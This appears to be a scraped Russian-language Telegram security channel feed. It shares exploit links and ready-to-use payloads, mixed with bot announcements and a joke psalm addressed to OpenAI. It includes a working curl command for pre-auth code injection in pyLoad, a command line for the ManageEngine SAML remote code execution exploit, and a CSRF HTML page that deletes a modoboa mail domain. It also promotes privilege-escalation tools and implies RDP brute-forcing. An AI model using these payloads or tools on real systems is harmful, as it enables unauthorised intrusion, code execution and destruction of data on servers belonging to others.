Windows Kernel Elevation of Privilege Vulnerability.
CVE-2022-21881
cve-2022-21881-io_completion-poc.cpp

CVE-2023-0297
Pre-auth RCE in pyLoad
read
Exploit Code:
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://<target>/flash/addcrypted2'

ОТСТАВИТЬ ПАНИКУ
БОТ был и останется бесплатным.
Сейчас тестируются новые фичи. К вечеру все будет доступно в одном из двух вариантов:
1. Допуск по телеграмм id для всех желающих
или
2. Допуск как и раньше, но с таймаутом сообщений в 30 сек
3. симбиоз первого и второго варианта

CVE-2022-46463
Проблема контроля доступа в Harbour v1.X.X–v2.5.3 позволяет злоумышленникам получать доступ к общедоступным и частным репозиториям без аутентификации.

Вообще Харбор крутая штука, для devops\devsecops

exploit

#harbor #repo

NGINXConfig
Самый простой способ настроить производительный, безопасный и стабильный NGINX сервер.
Ну вдруг вам нужно, натыкали галочек, получили конфиг.
НаТыкать

#nginx

CVE-2023-22809 - опять Sudo, опять bypass😏

#Unix #linux #sudo #bypass

CVE-2022-47966
*
Список ПО от ManageEngine подверженных атаке поражает !
*
Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.
*
read
*
POC/exploit
*
Usage:
python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe

Чаты и каналы Telegram по информационной безопасности 2023
Хорошая подборочка over 100, но нас в ней нет ((
Забираем

SUDO KILLER
Тулза для выявления и использования неправильных конфигураций и уязвимостей правил sudo для повышения привилегий Linux.

download

Exploiting null-dereferences in the Linux kernel
Интересное

#linux #kernel

В продолжении темы
Появился nuclei-template для дыры CVE-2022-47966.yaml
Ну и сам nuclei забрать тут
****
Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать

Wolfenstein 3D CGA
Тут и описание то не нужно. забрать

#wolf #90

Если я пойду и долиною смертной тени, не убоюсь зла, потому что Ты со мной openAI;
Твой жезл и Твой посох - они успокаивают меня. Ты приготовил предо мною трапезу в виду врагов моих; умастил елеем голову мою; чаша моя преисполнена.

BOT off как вы поняли

RDP
Asynchronous RDP client for Python (headless)
*
Ну Вы понимаете, да ? )))
подобрать

Коннектимся!

Microsoft Teams - RCE
download

CVE-2023-0179 PoC
эксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6
Понять глубину

#linux #kernel #lpe #nftables

переоформим !

CVE-2023-0398 modoboa - mail Server

CSRF приводит к удалению домена
*
usage fot BURP:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <noscript>history.pushState('', '', '/')</noscript>
    <form action="http://127.0.0.1:8000/admin/domains/4/delete/">
      <input type="submit" value="Submit request" />
    </form>
    <noscript>
      document.forms[0].submit();
    </noscript>
  </body>
</html>

read